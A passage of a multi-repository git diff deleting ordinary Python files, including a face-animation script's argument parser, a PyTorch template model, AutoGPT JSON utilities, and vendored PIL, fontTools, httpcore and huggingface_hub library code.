default='./examples/source_image/full_body_1.png', help="path to source image") - parser.add_argument("--ref_eyeblink", default=None, help="path to reference video providing eye blinking") - parser.add_argument("--ref_pose", default=None, help="path to reference video providing pose") - parser.add_argument("--checkpoint_dir", default='./checkpoints', help="path to output") - parser.add_argument("--result_dir", default='./results', help="path to output") - parser.add_argument("--pose_style", type=int, default=0, help="input pose style from [0, 46)") - parser.add_argument("--batch_size", type=int, default=2, help="the batch size of facerender") - parser.add_argument("--size", type=int, default=256, help="the image size of the facerender") - parser.add_argument("--expression_scale", type=float, default=1., help="the batch size of facerender") - parser.add_argument('--input_yaw', nargs='+', type=int, default=None, help="the input yaw degree of the user ") - parser.add_argument('--input_pitch', nargs='+', type=int, default=None, help="the input pitch degree of the user") - parser.add_argument('--input_roll', nargs='+', type=int, default=None, help="the input roll degree of the user") - parser.add_argument('--enhancer', type=str, default=None, help="Face enhancer, [gfpgan, RestoreFormer]") - parser.add_argument('--background_enhancer', type=str, default=None, help="background enhancer, [realesrgan]") - parser.add_argument("--cpu", dest="cpu", action="store_true") - parser.add_argument("--face3dvis", action="store_true", help="generate 3d face and 3d landmarks") - parser.add_argument("--still", action="store_true", help="can crop back to the original videos for the full body aniamtion") - parser.add_argument("--preprocess", default='crop', choices=['crop', 'extcrop', 'resize', 'full', 'extfull'], help="how to preprocess the images" ) - parser.add_argument("--verbose",action="store_true", help="saving the intermedia output or not" ) - parser.add_argument("--old_version",action="store_true", help="use the pth other than safetensor version" ) - - - # net structure and parameters - parser.add_argument('--net_recon', type=str, default='resnet50', choices=['resnet18', 'resnet34', 'resnet50'], help='useless') - parser.add_argument('--init_path', type=str, default=None, help='Useless') - parser.add_argument('--use_last_fc',default=False, help='zero initialize the last fc') - parser.add_argument('--bfm_folder', type=str, default='./checkpoints/BFM_Fitting/') - parser.add_argument('--bfm_model', type=str, default='BFM_model_front.mat', help='bfm model') - - # default renderer parameters - parser.add_argument('--focal', type=float, default=1015.) - parser.add_argument('--center', type=float, default=112.) - parser.add_argument('--camera_d', type=float, default=10.) - parser.add_argument('--z_near', type=float, default=5.) - parser.add_argument('--z_far', type=float, default=15.) - - args = parser.parse_args() - - if torch.cuda.is_available() and not args.cpu: - args.device = "cuda" - else: - args.device = "cpu" - - main(args) - diff --git a/spaces/kevinwang676/VoiceChanger/src/face3d/models/template_model.py b/spaces/kevinwang676/VoiceChanger/src/face3d/models/template_model.py deleted file mode 100644 index dac7b33d5889777eb63c9882a3b9fa094dcab293..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/VoiceChanger/src/face3d/models/template_model.py +++ /dev/null @@ -1,100 +0,0 @@ -"""Model class template - -This module provides a template for users to implement custom models. -You can specify '--model template' to use this model. -The class name should be consistent with both the filename and its model option. -The filename should be _dataset.py -The class name should be Dataset.py -It implements a simple image-to-image translation baseline based on regression loss. -Given input-output pairs (data_A, data_B), it learns a network netG that can minimize the following L1 loss: - min_ ||netG(data_A) - data_B||_1 -You need to implement the following functions: - : Add model-specific options and rewrite default values for existing options. - <__init__>: Initialize this model class. - : Unpack input data and perform data pre-processing. - : Run forward pass. This will be called by both and . - : Update network weights; it will be called in every training iteration. -""" -import numpy as np -import torch -from .base_model import BaseModel -from . import networks - - -class TemplateModel(BaseModel): - @staticmethod - def modify_commandline_options(parser, is_train=True): - """Add new model-specific options and rewrite default values for existing options. - - Parameters: - parser -- the option parser - is_train -- if it is training phase or test phase. You can use this flag to add training-specific or test-specific options. - - Returns: - the modified parser. - """ - parser.set_defaults(dataset_mode='aligned') # You can rewrite default values for this model. For example, this model usually uses aligned dataset as its dataset. - if is_train: - parser.add_argument('--lambda_regression', type=float, default=1.0, help='weight for the regression loss') # You can define new arguments for this model. - - return parser - - def __init__(self, opt): - """Initialize this model class. - - Parameters: - opt -- training/test options - - A few things can be done here. - - (required) call the initialization function of BaseModel - - define loss function, visualization images, model names, and optimizers - """ - BaseModel.__init__(self, opt) # call the initialization method of BaseModel - # specify the training losses you want to print out. The program will call base_model.get_current_losses to plot the losses to the console and save them to the disk. - self.loss_names = ['loss_G'] - # specify the images you want to save and display. The program will call base_model.get_current_visuals to save and display these images. - self.visual_names = ['data_A', 'data_B', 'output'] - # specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks to save and load networks. - # you can use opt.isTrain to specify different behaviors for training and test. For example, some networks will not be used during test, and you don't need to load them. - self.model_names = ['G'] - # define networks; you can use opt.isTrain to specify different behaviors for training and test. - self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, gpu_ids=self.gpu_ids) - if self.isTrain: # only defined during training time - # define your loss functions. You can use losses provided by torch.nn such as torch.nn.L1Loss. - # We also provide a GANLoss class "networks.GANLoss". self.criterionGAN = networks.GANLoss().to(self.device) - self.criterionLoss = torch.nn.L1Loss() - # define and initialize optimizers. You can define one optimizer for each network. - # If two networks are updated at the same time, you can use itertools.chain to group them. See cycle_gan_model.py for an example. - self.optimizer = torch.optim.Adam(self.netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999)) - self.optimizers = [self.optimizer] - - # Our program will automatically call to define schedulers, load networks, and print networks - - def set_input(self, input): - """Unpack input data from the dataloader and perform necessary pre-processing steps. - - Parameters: - input: a dictionary that contains the data itself and its metadata information. - """ - AtoB = self.opt.direction == 'AtoB' # use to swap data_A and data_B - self.data_A = input['A' if AtoB else 'B'].to(self.device) # get image data A - self.data_B = input['B' if AtoB else 'A'].to(self.device) # get image data B - self.image_paths = input['A_paths' if AtoB else 'B_paths'] # get image paths - - def forward(self): - """Run forward pass. This will be called by both functions and .""" - self.output = self.netG(self.data_A) # generate output image given the input data_A - - def backward(self): - """Calculate losses, gradients, and update network weights; called in every training iteration""" - # caculate the intermediate results if necessary; here self.output has been computed during function - # calculate loss given the input and intermediate results - self.loss_G = self.criterionLoss(self.output, self.data_B) * self.opt.lambda_regression - self.loss_G.backward() # calculate gradients of network G w.r.t. loss_G - - def optimize_parameters(self): - """Update network weights; it will be called in every training iteration.""" - self.forward() # first call forward to calculate intermediate results - self.optimizer.zero_grad() # clear network G's existing gradients - self.backward() # calculate gradients for network G - self.optimizer.step() # update gradients for network G diff --git a/spaces/kinensake/quanquan/lm_scorer/models/__init__.py b/spaces/kinensake/quanquan/lm_scorer/models/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/kukuhtw/AutoGPT/autogpt/json_utils/utilities.py b/spaces/kukuhtw/AutoGPT/autogpt/json_utils/utilities.py deleted file mode 100644 index eb9bb687750460fed2f4547b67e41f8e8c877a41..0000000000000000000000000000000000000000 --- a/spaces/kukuhtw/AutoGPT/autogpt/json_utils/utilities.py +++ /dev/null @@ -1,54 +0,0 @@ -"""Utilities for the json_fixes package.""" -import json -import re - -from jsonschema import Draft7Validator - -from autogpt.config import Config -from autogpt.logs import logger - -CFG = Config() - - -def extract_char_position(error_message: str) -> int: - """Extract the character position from the JSONDecodeError message. - - Args: - error_message (str): The error message from the JSONDecodeError - exception. - - Returns: - int: The character position. - """ - - char_pattern = re.compile(r"\(char (\d+)\)") - if match := char_pattern.search(error_message): - return int(match[1]) - else: - raise ValueError("Character position not found in the error message.") - - -def validate_json(json_object: object, schema_name: object) -> object: - """ - :type schema_name: object - :param schema_name: - :type json_object: object - """ - with open(f"autogpt/json_utils/{schema_name}.json", "r") as f: - schema = json.load(f) - validator = Draft7Validator(schema) - - if errors := sorted(validator.iter_errors(json_object), key=lambda e: e.path): - logger.error("The JSON object is invalid.") - if CFG.debug_mode: - logger.error( - json.dumps(json_object, indent=4) - ) # Replace 'json_object' with the variable containing the JSON data - logger.error("The following issues were found:") - - for error in errors: - logger.error(f"Error: {error.message}") - elif CFG.debug_mode: - print("The JSON object is valid.") - - return json_object diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/PIL/ImageChops.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/PIL/ImageChops.py deleted file mode 100644 index 70120031797c2493c0ce878c13c3fd3d5554c354..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/PIL/ImageChops.py +++ /dev/null @@ -1,303 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# standard channel operations -# -# History: -# 1996-03-24 fl Created -# 1996-08-13 fl Added logical operations (for "1" images) -# 2000-10-12 fl Added offset method (from Image.py) -# -# Copyright (c) 1997-2000 by Secret Labs AB -# Copyright (c) 1996-2000 by Fredrik Lundh -# -# See the README file for information on usage and redistribution. -# - -from . import Image - - -def constant(image, value): - """Fill a channel with a given grey level. - - :rtype: :py:class:`~PIL.Image.Image` - """ - - return Image.new("L", image.size, value) - - -def duplicate(image): - """Copy a channel. Alias for :py:meth:`PIL.Image.Image.copy`. - - :rtype: :py:class:`~PIL.Image.Image` - """ - - return image.copy() - - -def invert(image): - """ - Invert an image (channel). :: - - out = MAX - image - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image.load() - return image._new(image.im.chop_invert()) - - -def lighter(image1, image2): - """ - Compares the two images, pixel by pixel, and returns a new image containing - the lighter values. :: - - out = max(image1, image2) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_lighter(image2.im)) - - -def darker(image1, image2): - """ - Compares the two images, pixel by pixel, and returns a new image containing - the darker values. :: - - out = min(image1, image2) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_darker(image2.im)) - - -def difference(image1, image2): - """ - Returns the absolute value of the pixel-by-pixel difference between the two - images. :: - - out = abs(image1 - image2) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_difference(image2.im)) - - -def multiply(image1, image2): - """ - Superimposes two images on top of each other. - - If you multiply an image with a solid black image, the result is black. If - you multiply with a solid white image, the image is unaffected. :: - - out = image1 * image2 / MAX - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_multiply(image2.im)) - - -def screen(image1, image2): - """ - Superimposes two inverted images on top of each other. :: - - out = MAX - ((MAX - image1) * (MAX - image2) / MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_screen(image2.im)) - - -def soft_light(image1, image2): - """ - Superimposes two images on top of each other using the Soft Light algorithm - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_soft_light(image2.im)) - - -def hard_light(image1, image2): - """ - Superimposes two images on top of each other using the Hard Light algorithm - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_hard_light(image2.im)) - - -def overlay(image1, image2): - """ - Superimposes two images on top of each other using the Overlay algorithm - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_overlay(image2.im)) - - -def add(image1, image2, scale=1.0, offset=0): - """ - Adds two images, dividing the result by scale and adding the - offset. If omitted, scale defaults to 1.0, and offset to 0.0. :: - - out = ((image1 + image2) / scale + offset) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_add(image2.im, scale, offset)) - - -def subtract(image1, image2, scale=1.0, offset=0): - """ - Subtracts two images, dividing the result by scale and adding the offset. - If omitted, scale defaults to 1.0, and offset to 0.0. :: - - out = ((image1 - image2) / scale + offset) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_subtract(image2.im, scale, offset)) - - -def add_modulo(image1, image2): - """Add two images, without clipping the result. :: - - out = ((image1 + image2) % MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_add_modulo(image2.im)) - - -def subtract_modulo(image1, image2): - """Subtract two images, without clipping the result. :: - - out = ((image1 - image2) % MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_subtract_modulo(image2.im)) - - -def logical_and(image1, image2): - """Logical AND between two images. - - Both of the images must have mode "1". If you would like to perform a - logical AND on an image with a mode other than "1", try - :py:meth:`~PIL.ImageChops.multiply` instead, using a black-and-white mask - as the second image. :: - - out = ((image1 and image2) % MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_and(image2.im)) - - -def logical_or(image1, image2): - """Logical OR between two images. - - Both of the images must have mode "1". :: - - out = ((image1 or image2) % MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_or(image2.im)) - - -def logical_xor(image1, image2): - """Logical XOR between two images. - - Both of the images must have mode "1". :: - - out = ((bool(image1) != bool(image2)) % MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_xor(image2.im)) - - -def blend(image1, image2, alpha): - """Blend images using constant transparency weight. Alias for - :py:func:`PIL.Image.blend`. - - :rtype: :py:class:`~PIL.Image.Image` - """ - - return Image.blend(image1, image2, alpha) - - -def composite(image1, image2, mask): - """Create composite using transparency mask. Alias for - :py:func:`PIL.Image.composite`. - - :rtype: :py:class:`~PIL.Image.Image` - """ - - return Image.composite(image1, image2, mask) - - -def offset(image, xoffset, yoffset=None): - """Returns a copy of the image where data has been offset by the given - distances. Data wraps around the edges. If ``yoffset`` is omitted, it - is assumed to be equal to ``xoffset``. - - :param image: Input image. - :param xoffset: The horizontal distance. - :param yoffset: The vertical distance. If omitted, both - distances are set to the same value. - :rtype: :py:class:`~PIL.Image.Image` - """ - - if yoffset is None: - yoffset = xoffset - image.load() - return image._new(image.im.offset(xoffset, yoffset)) diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/scaleUpem.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/scaleUpem.py deleted file mode 100644 index 7018f27a7c8bc15935997c91ba36864c230dee8e..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/scaleUpem.py +++ /dev/null @@ -1,395 +0,0 @@ -"""Change the units-per-EM of a font. - -AAT and Graphite tables are not supported. CFF/CFF2 fonts -are de-subroutinized.""" - - -from fontTools.ttLib.ttVisitor import TTVisitor -import fontTools.ttLib as ttLib -import fontTools.ttLib.tables.otBase as otBase -import fontTools.ttLib.tables.otTables as otTables -from fontTools.cffLib import VarStoreData -import fontTools.cffLib.specializer as cffSpecializer -from fontTools.varLib import builder # for VarData.calculateNumShorts -from fontTools.misc.fixedTools import otRound -from fontTools.ttLib.tables._g_l_y_f import VarComponentFlags - - -__all__ = ["scale_upem", "ScalerVisitor"] - - -class ScalerVisitor(TTVisitor): - def __init__(self, scaleFactor): - self.scaleFactor = scaleFactor - - def scale(self, v): - return otRound(v * self.scaleFactor) - - -@ScalerVisitor.register_attrs( - ( - (ttLib.getTableClass("head"), ("unitsPerEm", "xMin", "yMin", "xMax", "yMax")), - (ttLib.getTableClass("post"), ("underlinePosition", "underlineThickness")), - (ttLib.getTableClass("VORG"), ("defaultVertOriginY")), - ( - ttLib.getTableClass("hhea"), - ( - "ascent", - "descent", - "lineGap", - "advanceWidthMax", - "minLeftSideBearing", - "minRightSideBearing", - "xMaxExtent", - "caretOffset", - ), - ), - ( - ttLib.getTableClass("vhea"), - ( - "ascent", - "descent", - "lineGap", - "advanceHeightMax", - "minTopSideBearing", - "minBottomSideBearing", - "yMaxExtent", - "caretOffset", - ), - ), - ( - ttLib.getTableClass("OS/2"), - ( - "xAvgCharWidth", - "ySubscriptXSize", - "ySubscriptYSize", - "ySubscriptXOffset", - "ySubscriptYOffset", - "ySuperscriptXSize", - "ySuperscriptYSize", - "ySuperscriptXOffset", - "ySuperscriptYOffset", - "yStrikeoutSize", - "yStrikeoutPosition", - "sTypoAscender", - "sTypoDescender", - "sTypoLineGap", - "usWinAscent", - "usWinDescent", - "sxHeight", - "sCapHeight", - ), - ), - ( - otTables.ValueRecord, - ("XAdvance", "YAdvance", "XPlacement", "YPlacement"), - ), # GPOS - (otTables.Anchor, ("XCoordinate", "YCoordinate")), # GPOS - (otTables.CaretValue, ("Coordinate")), # GDEF - (otTables.BaseCoord, ("Coordinate")), # BASE - (otTables.MathValueRecord, ("Value")), # MATH - (otTables.ClipBox, ("xMin", "yMin", "xMax", "yMax")), # COLR - ) -) -def visit(visitor, obj, attr, value): - setattr(obj, attr, visitor.scale(value)) - - -@ScalerVisitor.register_attr( - (ttLib.getTableClass("hmtx"), ttLib.getTableClass("vmtx")), "metrics" -) -def visit(visitor, obj, attr, metrics): - for g in metrics: - advance, lsb = metrics[g] - metrics[g] = visitor.scale(advance), visitor.scale(lsb) - - -@ScalerVisitor.register_attr(ttLib.getTableClass("VMTX"), "VOriginRecords") -def visit(visitor, obj, attr, VOriginRecords): - for g in VOriginRecords: - VOriginRecords[g] = visitor.scale(VOriginRecords[g]) - - -@ScalerVisitor.register_attr(ttLib.getTableClass("glyf"), "glyphs") -def visit(visitor, obj, attr, glyphs): - for g in glyphs.values(): - for attr in ("xMin", "xMax", "yMin", "yMax"): - v = getattr(g, attr, None) - if v is not None: - setattr(g, attr, visitor.scale(v)) - - if g.isComposite(): - for component in g.components: - component.x = visitor.scale(component.x) - component.y = visitor.scale(component.y) - continue - - if g.isVarComposite(): - for component in g.components: - for attr in ("translateX", "translateY", "tCenterX", "tCenterY"): - v = getattr(component.transform, attr) - setattr(component.transform, attr, visitor.scale(v)) - continue - - if hasattr(g, "coordinates"): - coordinates = g.coordinates - for i, (x, y) in enumerate(coordinates): - coordinates[i] = visitor.scale(x), visitor.scale(y) - - -@ScalerVisitor.register_attr(ttLib.getTableClass("gvar"), "variations") -def visit(visitor, obj, attr, variations): - - # VarComposites are a pain to handle :-( - glyfTable = visitor.font["glyf"] - - for glyphName, varlist in variations.items(): - glyph = glyfTable[glyphName] - isVarComposite = glyph.isVarComposite() - for var in varlist: - coordinates = var.coordinates - - if not isVarComposite: - for i, xy in enumerate(coordinates): - if xy is None: - continue - coordinates[i] = visitor.scale(xy[0]), visitor.scale(xy[1]) - continue - - # VarComposite glyph - - i = 0 - for component in glyph.components: - if component.flags & VarComponentFlags.AXES_HAVE_VARIATION: - i += len(component.location) - if component.flags & ( - VarComponentFlags.HAVE_TRANSLATE_X - | VarComponentFlags.HAVE_TRANSLATE_Y - ): - xy = coordinates[i] - coordinates[i] = visitor.scale(xy[0]), visitor.scale(xy[1]) - i += 1 - if component.flags & VarComponentFlags.HAVE_ROTATION: - i += 1 - if component.flags & ( - VarComponentFlags.HAVE_SCALE_X | VarComponentFlags.HAVE_SCALE_Y - ): - i += 1 - if component.flags & ( - VarComponentFlags.HAVE_SKEW_X | VarComponentFlags.HAVE_SKEW_Y - ): - i += 1 - if component.flags & ( - VarComponentFlags.HAVE_TCENTER_X | VarComponentFlags.HAVE_TCENTER_Y - ): - xy = coordinates[i] - coordinates[i] = visitor.scale(xy[0]), visitor.scale(xy[1]) - i += 1 - - # Phantom points - assert i + 4 == len(coordinates) - for i in range(i, len(coordinates)): - xy = coordinates[i] - coordinates[i] = visitor.scale(xy[0]), visitor.scale(xy[1]) - - -@ScalerVisitor.register_attr(ttLib.getTableClass("kern"), "kernTables") -def visit(visitor, obj, attr, kernTables): - for table in kernTables: - kernTable = table.kernTable - for k in kernTable.keys(): - kernTable[k] = visitor.scale(kernTable[k]) - - -def _cff_scale(visitor, args): - for i, arg in enumerate(args): - if not isinstance(arg, list): - if not isinstance(arg, bytes): - args[i] = visitor.scale(arg) - else: - num_blends = arg[-1] - _cff_scale(visitor, arg) - arg[-1] = num_blends - - -@ScalerVisitor.register_attr( - (ttLib.getTableClass("CFF "), ttLib.getTableClass("CFF2")), "cff" -) -def visit(visitor, obj, attr, cff): - cff.desubroutinize() - topDict = cff.topDictIndex[0] - varStore = getattr(topDict, "VarStore", None) - getNumRegions = varStore.getNumRegions if varStore is not None else None - privates = set() - for fontname in cff.keys(): - font = cff[fontname] - cs = font.CharStrings - for g in font.charset: - c, _ = cs.getItemAndSelector(g) - privates.add(c.private) - - commands = cffSpecializer.programToCommands( - c.program, getNumRegions=getNumRegions - ) - for op, args in commands: - if op == "vsindex": - continue - _cff_scale(visitor, args) - c.program[:] = cffSpecializer.commandsToProgram(commands) - - # Annoying business of scaling numbers that do not matter whatsoever - - for attr in ( - "UnderlinePosition", - "UnderlineThickness", - "FontBBox", - "StrokeWidth", - ): - value = getattr(topDict, attr, None) - if value is None: - continue - if isinstance(value, list): - _cff_scale(visitor, value) - else: - setattr(topDict, attr, visitor.scale(value)) - - for i in range(6): - topDict.FontMatrix[i] /= visitor.scaleFactor - - for private in privates: - for attr in ( - "BlueValues", - "OtherBlues", - "FamilyBlues", - "FamilyOtherBlues", - # "BlueScale", - # "BlueShift", - # "BlueFuzz", - "StdHW", - "StdVW", - "StemSnapH", - "StemSnapV", - "defaultWidthX", - "nominalWidthX", - ): - value = getattr(private, attr, None) - if value is None: - continue - if isinstance(value, list): - _cff_scale(visitor, value) - else: - setattr(private, attr, visitor.scale(value)) - - -# ItemVariationStore - - -@ScalerVisitor.register(otTables.VarData) -def visit(visitor, varData): - for item in varData.Item: - for i, v in enumerate(item): - item[i] = visitor.scale(v) - varData.calculateNumShorts() - - -# COLRv1 - - -def _setup_scale_paint(paint, scale): - if -2 <= scale <= 2 - (1 >> 14): - paint.Format = otTables.PaintFormat.PaintScaleUniform - paint.scale = scale - return - - transform = otTables.Affine2x3() - transform.populateDefaults() - transform.xy = transform.yx = transform.dx = transform.dy = 0 - transform.xx = transform.yy = scale - - paint.Format = otTables.PaintFormat.PaintTransform - paint.Transform = transform - - -@ScalerVisitor.register(otTables.BaseGlyphPaintRecord) -def visit(visitor, record): - oldPaint = record.Paint - - scale = otTables.Paint() - _setup_scale_paint(scale, visitor.scaleFactor) - scale.Paint = oldPaint - - record.Paint = scale - - return True - - -@ScalerVisitor.register(otTables.Paint) -def visit(visitor, paint): - if paint.Format != otTables.PaintFormat.PaintGlyph: - return True - - newPaint = otTables.Paint() - newPaint.Format = paint.Format - newPaint.Paint = paint.Paint - newPaint.Glyph = paint.Glyph - del paint.Paint - del paint.Glyph - - _setup_scale_paint(paint, 1 / visitor.scaleFactor) - paint.Paint = newPaint - - visitor.visit(newPaint.Paint) - - return False - - -def scale_upem(font, new_upem): - """Change the units-per-EM of font to the new value.""" - upem = font["head"].unitsPerEm - visitor = ScalerVisitor(new_upem / upem) - visitor.visit(font) - - -def main(args=None): - """Change the units-per-EM of fonts""" - - if args is None: - import sys - - args = sys.argv[1:] - - from fontTools.ttLib import TTFont - from fontTools.misc.cliTools import makeOutputFileName - import argparse - - parser = argparse.ArgumentParser( - "fonttools ttLib.scaleUpem", description="Change the units-per-EM of fonts" - ) - parser.add_argument("font", metavar="font", help="Font file.") - parser.add_argument( - "new_upem", metavar="new-upem", help="New units-per-EM integer value." - ) - parser.add_argument( - "--output-file", metavar="path", default=None, help="Output file." - ) - - options = parser.parse_args(args) - - font = TTFont(options.font) - new_upem = int(options.new_upem) - output_file = ( - options.output_file - if options.output_file is not None - else makeOutputFileName(options.font, overWrite=True, suffix="-scaled") - ) - - scale_upem(font, new_upem) - - print("Writing %s" % output_file) - font.save(output_file) - - -if __name__ == "__main__": - import sys - - sys.exit(main()) diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/J_S_T_F_.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/J_S_T_F_.py deleted file mode 100644 index 111c700710e56f1f92703b212b530267313293ba..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/J_S_T_F_.py +++ /dev/null @@ -1,5 +0,0 @@ -from .otBase import BaseTTXConverter - - -class table_J_S_T_F_(BaseTTXConverter): - pass diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/httpcore/_ssl.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/httpcore/_ssl.py deleted file mode 100644 index c99c5a67945b8a3a3544d481e979c791ab45fe23..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/httpcore/_ssl.py +++ /dev/null @@ -1,9 +0,0 @@ -import ssl - -import certifi - - -def default_ssl_context() -> ssl.SSLContext: - context = ssl.create_default_context() - context.load_verify_locations(certifi.where()) - return context diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/huggingface_hub/utils/_cache_manager.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/huggingface_hub/utils/_cache_manager.py deleted file mode 100644 index 3e1443a78945ea55725f75cdbfa7a17091e2d8b1..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/huggingface_hub/utils/_cache_manager.py +++ /dev/null @@ -1,810 +0,0 @@ -# coding=utf-8 -# Copyright 2022-present, the HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -"""Contains utilities to manage the HF cache directory.""" -import os -import shutil -import time -from collections import defaultdict -from dataclasses import dataclass -from pathlib import Path -from typing import Dict, FrozenSet, List, Optional, Set, Union - -from ..constants import HUGGINGFACE_HUB_CACHE -from . import logging -from ._typing import Literal - - -logger = logging.get_logger(__name__) - -REPO_TYPE_T = Literal["model", "dataset", "space"] - - -class CacheNotFound(Exception): - """Exception thrown when the Huggingface cache is not found.""" - - cache_dir = Union[str, Path] - - def __init__(self, msg: str, cache_dir: Union[str, Path], *args, **kwargs): - super().__init__(msg, *args, **kwargs) - self.cache_dir = cache_dir - - -class CorruptedCacheException(Exception): - """Exception for any unexpected structure in the Huggingface cache-system.""" - - -@dataclass(frozen=True) -class CachedFileInfo: - """Frozen data structure holding information about a single cached file. - - Args: - file_name (`str`): - Name of the file. Example: `config.json`. - file_path (`Path`): - Path of the file in the `snapshots` directory. The file path is a symlink - referring to a blob in the `blobs` folder. - blob_path (`Path`): - Path of the blob file. This is equivalent to `file_path.resolve()`. - size_on_disk (`int`): - Size of the blob file in bytes. - blob_last_accessed (`float`): - Timestamp of the last time the blob file has been accessed (from any - revision). - blob_last_modified (`float`): - Timestamp of the last time the blob file has been modified/created. - - - - `blob_last_accessed` and `blob_last_modified` reliability can depend on the OS you - are using. See [python documentation](https://docs.python.org/3/library/os.html#os.stat_result) - for more details. - - - """ - - file_name: str - file_path: Path - blob_path: Path - size_on_disk: int - - blob_last_accessed: float - blob_last_modified: float - - @property - def blob_last_accessed_str(self) -> str: - """ - (property) Timestamp of the last time the blob file has been accessed (from any - revision), returned as a human-readable string. - - Example: "2 weeks ago". - """ - return _format_timesince(self.blob_last_accessed) - - @property - def blob_last_modified_str(self) -> str: - """ - (property) Timestamp of the last time the blob file has been modified, returned - as a human-readable string. - - Example: "2 weeks ago". - """ - return _format_timesince(self.blob_last_modified) - - @property - def size_on_disk_str(self) -> str: - """ - (property) Size of the blob file as a human-readable string. - - Example: "42.2K". - """ - return _format_size(self.size_on_disk) - - -@dataclass(frozen=True) -class CachedRevisionInfo: - """Frozen data structure holding information about a revision. - - A revision correspond to a folder in the `snapshots` folder and is populated with - the exact tree structure as the repo on the Hub but contains only symlinks. A - revision can be either referenced by 1 or more `refs` or be "detached" (no refs). - - Args: - commit_hash (`str`): - Hash of the revision (unique). - Example: `"9338f7b671827df886678df2bdd7cc7b4f36dffd"`. - snapshot_path (`Path`): - Path to the revision directory in the `snapshots` folder. It contains the - exact tree structure as the repo on the Hub. - files: (`FrozenSet[CachedFileInfo]`): - Set of [`~CachedFileInfo`] describing all files contained in the snapshot. - refs (`FrozenSet[str]`): - Set of `refs` pointing to this revision. If the revision has no `refs`, it - is considered detached. - Example: `{"main", "2.4.0"}` or `{"refs/pr/1"}`. - size_on_disk (`int`): - Sum of the blob file sizes that are symlink-ed by the revision. - last_modified (`float`): - Timestamp of the last time the revision has been created/modified. - - - - `last_accessed` cannot be determined correctly on a single revision as blob files - are shared across revisions. - - - - - - `size_on_disk` is not necessarily the sum of all file sizes because of possible - duplicated files. Besides, only blobs are taken into account, not the (negligible) - size of folders and symlinks. - - - """ - - commit_hash: str - snapshot_path: Path - size_on_disk: int - files: FrozenSet[CachedFileInfo] - refs: FrozenSet[str] - - last_modified: float - - @property - def last_modified_str(self) -> str: - """ - (property) Timestamp of the last time the revision has been modified, returned - as a human-readable string. - - Example: "2 weeks ago". - """ - return _format_timesince(self.last_modified) - - @property - def size_on_disk_str(self) -> str: - """ - (property) Sum of the blob file sizes as a human-readable string. - - Example: "42.2K". - """ - return _format_size(self.size_on_disk) - - @property - def nb_files(self) -> int: - """ - (property) Total number of files in the revision. - """ - return len(self.files) - - -@dataclass(frozen=True) -class CachedRepoInfo: - """Frozen data structure holding information about a cached repository. - - Args: - repo_id (`str`): - Repo id of the repo on the Hub. Example: 